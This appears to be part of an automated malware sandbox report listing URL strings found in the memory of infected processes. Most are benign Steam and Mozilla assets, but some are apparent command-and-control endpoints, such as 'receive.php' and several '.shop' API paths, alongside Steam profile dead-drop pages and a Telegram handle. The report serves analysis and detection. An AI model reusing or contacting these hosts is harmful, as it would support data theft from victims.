Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000050E000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2351016346.000000000135E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2356059269.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009323531.0000000001706000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modal
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, FCFBFB.10.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, FCFBFB.10.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: userBGIJEGCGDG.exe, 00000012.00000002.2484268672.0000000005090000.00000004.08000000.00040000.00000000.sdmp, GIEBGIIJDG.exe, 0000003E.00000002.2939917338.00000000023EF000.00000004.00000800.00020000.00000000.sdmp, GIEBGIIJDG.exe, 0000003E.00000002.2939917338.00000000023D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lontivero/Open.Nat/issuesOAlso
Source: userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu
Source: GIEBGIIJDG.exe, 0000003E.00000002.2939917338.00000000023EF000.00000004.00000800.00020000.00000000.sdmp, GIEBGIIJDG.exe, 0000003E.00000002.2936387941.000000000057C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu/receive.php
Source: userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu/receive.phpd
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: FCFBFB.10.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: https://mozilla.org0/
Source: RegAsm.exe, 0000003A.00000002.3007548763.000000000168D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offensivedzvju.shop/
Source: RDPWInst.exe, 0000001A.00000000.2254101327.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
Source: RegAsm.exe, 0000003A.00000002.3007548763.000000000168D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reinforcenh.shop/
Source: RegAsm.exe, 0000003A.00000002.3007548763.000000000168D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reinforcenh.shop/apii
Source: RegAsm.exe, 00000011.00000002.2352606132.0000000001387000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reinforcenh.shop/e
Source: RegAsm.exe, 0000003D.00000002.3283819592.0000000001151000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: 76561199780418869[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2356059269.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009323531.0000000001706000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: RegAsm.exe, 00000011.00000002.2352606132.0000000001387000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3007548763.000000000168D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: RegAsm.exe, 00000011.00000002.2351016346.000000000135E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2354635623.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2356059269.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009323531.0000000001706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: userAFHDHCAAKE.exe, 00000007.00000002.2211440894.0000000003945000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 0000000A.00000002.2971689518.0000000001211000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.0000000001151000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: RegAsm.exe, 0000003D.00000002.3283819592.0000000001151000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869=
Source: userAFHDHCAAKE.exe, 00000007.00000002.2211440894.0000000003945000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: RegAsm.exe, 0000003A.00000002.3007548763.000000000168D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stogeneratmns.shop/apiT
